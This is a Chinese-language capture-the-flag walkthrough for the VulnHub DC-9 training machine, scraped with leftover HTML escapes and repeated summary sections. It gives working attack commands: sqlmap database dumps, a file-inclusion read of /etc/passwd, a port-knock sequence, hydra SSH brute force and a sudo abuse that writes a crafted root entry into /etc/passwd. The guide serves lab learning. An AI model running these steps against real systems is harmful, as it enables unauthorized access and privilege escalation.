VulnHub靶机 DC-9 渗透测试详细教程<\/h1>

1. 环境准备<\/h2>

1.1 靶机下载<\/h3>

靶机下载地址: https:\/\/www.vulnhub.com\/entry\/dc-9,412\/<\/a><\/li>

将下载的靶机导入到虚拟机软件(如VMware或VirtualBox)<\/li> <\/ul>

1.2 网络配置<\/h3>

确保攻击机和靶机在同一网络段<\/li>

建议使用NAT或桥接模式<\/li> <\/ul>

2. 信息收集<\/h2>

2.1 主机发现<\/h3>

arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 192.168.1.0\/24
<\/span><\/span><\/code><\/pre>2.2 端口扫描<\/h3>
nmap -p- 192.168.43.5
<\/span><\/span><\/code><\/pre>发现开放端口<\/strong>:<\/p>

80\/tcp (HTTP)<\/li>
22\/tcp (SSH, 初始状态为filtered)<\/li>
<\/ul>
2.3 服务版本探测<\/h3>
nmap -p80 -sV -A 192.168.43.5
<\/span><\/span><\/code><\/pre>2.4 Web指纹识别<\/h3>
whatweb http:\/\/192.168.43.5\/index.php
<\/span><\/span><\/code><\/pre>2.5 目录扫描<\/h3>
dirsearch -u http:\/\/192.168.43.5\/ -i 200<\/span>
<\/span><\/span><\/code><\/pre>3. Web渗透<\/h2>
3.1 SQL注入发现<\/h3>

在搜索栏测试输入特殊字符<\/li>
使用Burp Suite抓包分析请求<\/li>
发现存在SQL注入漏洞<\/li>
<\/ol>
3.2 使用sqlmap自动化注入<\/h3>

保存请求为sql.txt<\/li>
测试当前数据库:<\/li>
<\/ol>
python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs
<\/span><\/span><\/code><\/pre>
脱库Staff数据库:<\/li>
<\/ol>
python sqlmap.py -r sql.txt --random-agent --batch -D Staff --dump
<\/span><\/span><\/code><\/pre>获取凭证<\/strong>:<\/p>

用户名: admin<\/li>
密码: transorbital1 (MD5解密后)<\/li>
<\/ul>

脱库users数据库:<\/li>
<\/ol>
python sqlmap.py -r sql.txt --random-agent --batch -D users --dump
<\/span><\/span><\/code><\/pre>获取大量用户名和密码信息<\/p>
3.3 后台登录<\/h3>

使用admin:transorbital1登录后台<\/li>
发现文件包含漏洞:<\/li>
<\/ol>
http:\/\/192.168.43.5\/welcome.php?file=etc\/passwd
<\/code><\/pre>

成功读取\/etc\/passwd文件<\/li>
<\/ol>
4. SSH服务利用<\/h2>
4.1 端口敲门服务<\/h3>
发现22端口初始为filtered状态，可能存在knockd服务<\/p>
敲门序列<\/strong>:<\/p>
nmap 192.168.43.5 -p 7469<\/span>
<\/span><\/span>nmap 192.168.43.5 -p 8475<\/span>
<\/span><\/span>nmap 192.168.43.5 -p 9842<\/span>
<\/span><\/span><\/code><\/pre>敲门后22端口将开放<\/p>
4.2 SSH爆破<\/h3>

整理从users数据库获取的用户名和密码<\/li>
使用hydra爆破:<\/li>
<\/ol>
hydra -L user.txt -P passwords.txt ssh:\/\/192.168.43.5
<\/span><\/span><\/code><\/pre>成功爆破出以下用户<\/strong>:<\/p>

chandlerb<\/li>
joeyt<\/li>
janitor<\/li>
<\/ul>
4.3 用户信息收集<\/h3>

登录janitor用户，发现隐藏文件包含更多密码<\/li>
将这些密码添加到字典中再次爆破<\/li>
获取新用户fredf的凭证<\/li>
<\/ol>
5. 权限提升<\/h2>
5.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以root权限执行\/opt\/devstuff\/dist\/test\/test<\/p>
5.2 分析test程序<\/h3>

该程序将第一个参数文件内容写入第二个参数文件<\/li>
可利用此功能修改\/etc\/passwd添加特权用户<\/li>
<\/ul>
5.3 构造特权用户<\/h3>

生成加密密码:<\/li>
<\/ol>
openssl passwd -1 -salt 123<\/span> admin
<\/span><\/span><\/code><\/pre>
构造passwd条目:<\/li>
<\/ol>
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3\/:0:0:admin:\/root:\/bin\/bash
<\/code><\/pre>

保存到临时文件\/tmp\/passwd<\/li>
<\/ol>
5.4 执行提权<\/h3>
sudo \/opt\/devstuff\/dist\/test\/test \/tmp\/passwd \/etc\/passwd
<\/span><\/span><\/code><\/pre>
切换admin用户:<\/li>
<\/ol>
su admin
<\/span><\/span>Password: admin
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
6. 总结<\/h2>
渗透流程<\/h3>

主机发现 → 端口扫描 → 服务识别<\/li>
Web渗透: SQL注入 → 获取凭证 → 后台登录 → 文件包含<\/li>
SSH利用: 端口敲门 → 爆破 → 用户枚举<\/li>
权限提升: sudo滥用 → 修改\/etc\/passwd → root权限<\/li>
<\/ol>
关键点<\/h3>

SQL注入漏洞利用<\/li>
端口敲门服务绕过<\/li>
密码重用和爆破<\/li>
sudo权限滥用提权<\/li>
<\/ul>
相关靶机系列<\/h3>

DC-1至DC-8靶机渗透过程可参考类似方法<\/li>
<\/ul>

VulnHub靶机 DC-9 渗透测试详细教程<\/h1>

1. 环境准备<\/h2>

2. 信息收集<\/h2>

3. Web渗透<\/h2>

4. SSH服务利用<\/h2>

5. 权限提升<\/h2>

6. 总结<\/h2>

关键点<\/h3> SQL注入漏洞利用<\/li> 端口敲门服务绕过<\/li> 密码重用和爆破<\/li> sudo权限滥用提权<\/li> <\/ul> 相关靶机系列<\/h3> DC-1至DC-8靶机渗透过程可参考类似方法<\/li> <\/ul>

相关靶机系列<\/h3> DC-1至DC-8靶机渗透过程可参考类似方法<\/li> <\/ul>

关键点<\/h3>

SQL注入漏洞利用<\/li>
端口敲门服务绕过<\/li>
密码重用和爆破<\/li>
sudo权限滥用提权<\/li> <\/ul>
相关靶机系列<\/h3>

DC-1至DC-8靶机渗透过程可参考类似方法<\/li> <\/ul>

相关靶机系列<\/h3>

DC-1至DC-8靶机渗透过程可参考类似方法<\/li> <\/ul>